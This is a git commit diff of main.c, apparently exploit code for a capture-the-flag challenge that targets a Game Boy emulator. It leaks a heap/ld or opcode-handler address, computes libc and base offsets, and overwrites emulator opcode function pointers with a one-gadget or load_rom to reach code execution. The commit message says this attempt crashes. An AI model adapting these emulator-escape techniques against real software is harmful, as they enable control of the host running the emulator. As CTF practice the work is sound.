commit 3464878abafda13241f2eaed3db8bfd696ee4b67 parent 818a0be94c63c6ddfabe108ca49e2c26922fc130 Author: Louis Burda <quent.burda@gmail.com> Date: Thu, 26 May 2022 15:24:01 +0200 Attempt via load_rom - crashes Diffstat:
| M | main.c | | | 37 | ++++++++++++++++++++----------------- |
1 file changed, 20 insertions(+), 17 deletions(-)
diff --git a/main.c b/main.c @@ -1,31 +1,34 @@ #include "stdint.h" +#include "string.h" void main(void) { - volatile static void *memory; - volatile static void *processor; + volatile static uint8_t *processor; volatile static uint64_t op0x00; - volatile static uint64_t libc; - volatile static uint64_t onegadget; - volatile static uint64_t ld_leak; + volatile static uint64_t base; + volatile static uint64_t load_rom; - /* memory - wrambanks = 0x72840 */ + /* processor - wrambanks = -0x126a0 */ - /* WRAM BANK = -73 */ - memory = (void*) 0xD7c0; + /* WRAM BANK = -0x13 */ + processor = (void*) 0xD960; - /* get leak from heap */ - ld_leak = *(uint64_t*)(memory + 0x30); - libc = ld_leak + 0x127dff0; - onegadget = libc + 0xe3afe; + /* leak opcode 0x00 to get base */ + op0x00 = *(uint64_t*)processor; + base = op0x00 - 0x1d420; + load_rom = base + 0x34ad0; - /* WRAM BANK -13 */ - *(uint8_t*)(memory + 0x7c) = 0xf3; /* LSB */ + /* set opcode 0x10 to load_rom */ + *(uint64_t*)(processor+0x10*0x10) = load_rom; - //* ..with new bank, overwrite op 0x00 funcptr */ - processor = (void*) 0xD960; - *(uint64_t*)(processor) = onegadget; + /* write /bin/sh to processor pointer (opcode 0x00) */ + strcpy(processor, "/home/ctf/wrapper.py"); + + __asm \ + stop \ + halt \ + __endasm; while (1); }